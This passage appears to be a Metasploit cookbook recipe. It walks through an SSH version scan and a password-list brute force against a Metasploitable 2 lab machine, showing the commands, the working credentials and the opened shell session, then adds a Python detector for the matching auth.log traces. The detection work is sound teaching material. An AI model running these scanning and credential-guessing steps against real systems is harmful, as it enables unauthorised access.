How to do it...
- To scan for SSH servers on the network, use the auxiliary/scanner/ssh/ssh_version auxiliary module, set the target address range in RHOSTS, and set THREADS to 256 concurrent threads:
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(ssh_version) > set RHOSTS 192.168.216.0/24
RHOSTS => 192.168.216.0/24
msf auxiliary(ssh_version) > set THREADS 256
THREADS => 256
msf auxiliary(ssh_version) > run
...
[*] Scanned 133 of 256 hosts (51% complete)
[*] Scanned 232 of 256 hosts (90% complete)
[*] Scanned 250 of 256 hosts (97% complete)
[*] Scanned 255 of 256 hosts (99% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_version) >
In this scan, the module reported the SSH server versions (banners) of the active hosts in the target address range. Once we have discovered the SSH version, we can search for known vulnerabilities affecting that specific version.
- To search for default or guessable credentials, use the SSH Login Check Scanner auxiliary module, which tests SSH logins against a range of machines and reports the successful ones:
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set USERNAME user
USERNAME => user
msf auxiliary(ssh_login) > set PASS_FILE /root/password.lst
PASS_FILE => /root/password.lst
msf auxiliary(ssh_login) > set RHOSTS 192.168.216.10,129
RHOSTS => 192.168.216.10,129
msf auxiliary(ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(ssh_login) > set THREADS 256
THREADS => 256
msf auxiliary(ssh_login) > run
[*] Scanned 1 of 2 hosts (50% complete)
[+] 192.168.216.129:22 - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (192.168.216.5:39227 -> 192.168.216.129:22) at 2017-10-21 06:11:14 -0400
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >
Looking at the output, we got lucky: the credentials user:user worked on the Metasploitable 2 target machine and the module opened command shell session 1.
- To interact with the new session, use the sessions command with the -i option followed by the session ID, in this case 1:
msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...
hostname
metasploitable
id
uid=1001(user) gid=1001(user) groups=1001(user)
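On the target, both steps above leave a recognisable trace in the SSH server's auth log: the ssh_version banner grab typically shows up as OpenSSH's "Did not receive identification string" entry, and the ssh_login password-list run shows up as a burst of "Failed password" entries from one source followed by an "Accepted password" entry. The following added example (not code from the original recipe or from Metasploit) parses constructed auth.log lines with that shape and flags both patterns; the log lines, the fail_threshold value and the alert labels are assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed sample auth.log lines (not taken from the original page) showing
# the server-side footprint of the two modules: a banner-only probe from the
# ssh_version scan, then a password-list run from ssh_login that ends in success.
SAMPLE_AUTH_LOG = """\
Oct 21 06:10:02 metasploitable sshd[4121]: Did not receive identification string from 192.168.216.5
Oct 21 06:10:58 metasploitable sshd[4130]: Failed password for user from 192.168.216.5 port 39201 ssh2
Oct 21 06:10:59 metasploitable sshd[4132]: Failed password for user from 192.168.216.5 port 39203 ssh2
Oct 21 06:11:00 metasploitable sshd[4134]: Failed password for user from 192.168.216.5 port 39205 ssh2
Oct 21 06:11:01 metasploitable sshd[4136]: Failed password for invalid user admin from 192.168.216.5 port 39207 ssh2
Oct 21 06:11:14 metasploitable sshd[4140]: Accepted password for user from 192.168.216.5 port 39227 ssh2
Oct 21 06:11:20 metasploitable sshd[4150]: Accepted publickey for backup from 192.168.216.7 port 51000 ssh2
"""

BANNER_PROBE = re.compile(r"Did not receive identification string from (\S+)")
FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port (\d+)")
ACCEPTED = re.compile(r"Accepted (\w+) for (\S+) from (\S+) port (\d+)")

def analyze_auth_log(text, fail_threshold=3):
    """Return (per-source stats, alerts) for the given auth log text.

    An alert is raised for a source that (a) sent banner-only probes, the
    ssh_version footprint, or (b) accumulated >= fail_threshold failed
    password attempts and then logged a successful password login, the
    footprint of ssh_login with STOP_ON_SUCCESS. fail_threshold is assumed."""
    stats = defaultdict(lambda: {"probes": 0, "failed": 0, "success_after_fail": []})
    for line in text.splitlines():
        m = BANNER_PROBE.search(line)
        if m:
            stats[m.group(1)]["probes"] += 1
            continue
        m = FAILED.search(line)
        if m:
            stats[m.group(2)]["failed"] += 1
            continue
        m = ACCEPTED.search(line)
        if m and m.group(1) == "password":      # key-based logins are not password guesses
            src = m.group(3)
            if stats[src]["failed"] >= fail_threshold:
                stats[src]["success_after_fail"].append(m.group(2))
    alerts = []
    for src, s in stats.items():
        if s["probes"]:
            alerts.append((src, "banner-grab scan", s["probes"]))
        if s["success_after_fail"]:
            alerts.append((src, "password guessing succeeded", ", ".join(s["success_after_fail"])))
    return dict(stats), alerts
```

Feeding the function /var/log/auth.log (or the equivalent journal export) instead of the constructed sample gives the same per-source view; the "password guessing succeeded" alert is the one that warrants immediate credential rotation and session review.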